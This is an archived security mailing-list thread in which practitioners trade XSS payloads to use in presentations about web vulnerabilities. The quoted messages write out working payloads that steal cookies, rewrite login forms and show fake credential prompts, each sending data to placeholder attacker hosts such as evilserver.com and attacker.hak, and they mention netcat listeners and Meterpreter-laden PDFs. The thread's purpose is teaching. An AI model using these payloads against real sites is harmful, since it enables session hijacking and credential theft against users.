While all these samples are really fun, I've lately had great luck by making two different XSS attacks when I'm showing folks.
One for the devs -- this tends to be a bit more "fun" and does stuff like click trapping. For marketing or the project managers -- the ones I've found most likely to sweep these bugs under the rug -- I send them "brand damage" examples. (Cock ring size is freaking hilarious, but would send me to HR). So I do things like image swapping, or setting the background to a LOLCat or a competitor logo. The all time XSS FTW moment was about 4 years ago now, when someone found an XSS problem on a McDonald's site. Their link was so damn sweet, it's what got me interested in web app security. when you clicked it, you we sent to a page that had all the McD's wrappings but the content section of the window was blank except for in lovely red letters it said: "Hey FATTIE! You really shouldn't be eating our food!" On Fri, May 29, 2009 at 3:35 AM, <[email protected]> wrote: > You could use a couple of typical password/cookie stealing examples. > > Cookie stealing iframe.: > "><IFRAME > SRC="javascript:window.location=%22http://evilserver.com/evil.php?stuff=%22+document.cookie" > height="1" width="1" frameborder="0"></IFRAME> > > Altering the logon form.: > "><script>window.onload = > function()document.loginForm.action='http://evilserver.com/evil.php?details='</script><!---- > > I like to use the logon form example for my penetration testing > presentations as it looks 100% normal to the user, except it redirects the > Submit button to send the logon information (username/password in most > cases) to your evilserver instead of the real server. You can also rewrite > the code in the users browser to remove password hashing to make it easier > to get the clear text password. On the server end I usually just put up a > Metasploit HTTP or a netcat listener on the evilserver.com address to output > the traffic to a logfile. You can also log it to a Database for mass farming > of data, but we don't do that kind of thing, we leave that to Bob ;) > > If you want something evil on the client-side, try an iframe that references > a PDF file. You can then export a PDF from Metasploit and embed the > Meterpreter payload for total world domination. > > Chris John Riley > > [email protected]@inet wrote on 28.05.2009 20:50:39: > >> Ok, I've got yet another presentation coming up, this time on the OWASP >> Top 10 >> and Mutillidae. One of the things I'm going to cover is XSS. The canonical >> example of course is: >> >> <script>alert("XSS");</script> >> >> but that is boring, and gives folks the impression that XSS is not that >> serious. Better short eample swoul be: >> >> Redirect traffic to your site: >> <script>window.location = "http://www.irongeek.com/"</script> >> >> A little cookie Grabbing: >> <script> >> new Image().src="http://some-ip/mutillidae/catch.php?cookie= >> "+encodeURI(document.cookie); >> </script> >> >> Or maybe a password form to make people think they have to login, but it >> just >> grabs the credentials: >> <script> >> username=prompt('Please enter your username',' '); >> password=prompt('Please enter your password',' '); >> document.write("<img src=\"http://attacker.hak/catch.php?username= >> "+username+"&password="+password+"\">"); >> </script> >> >> What are other cool thing to inject, besides maybe BeEF, that shows of how >> XSS >> can be a big deal? >> >> Thanks, >> Adrian >> _______________________________________________ >> Pauldotcom mailing list >> [email protected] >> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom >> Main Web Site: http://pauldotcom.com > ---------------------------------------- > Raiffeisen Informatik GmbH, Firmenbuchnr. 88239p, Handelsgericht Wien, DVR > 0486809, UID ATU 16351908 > > Der Austausch von Nachrichten mit oben angefuehrtem Absender via E-Mail > dient ausschliesslich Informationszwecken. Rechtsgeschaeftliche Erklaerungen > duerfen ueber dieses Medium nicht ausgetauscht werden. > Correspondence with above mentioned sender via e-mail is only for > information purposes. This medium may not be used for exchange of > legally-binding communications. > ---------------------------------------- > > > _______________________________________________ > Pauldotcom mailing list > [email protected] > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > Main Web Site: http://pauldotcom.com > _______________________________________________ Pauldotcom mailing list [email protected] http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
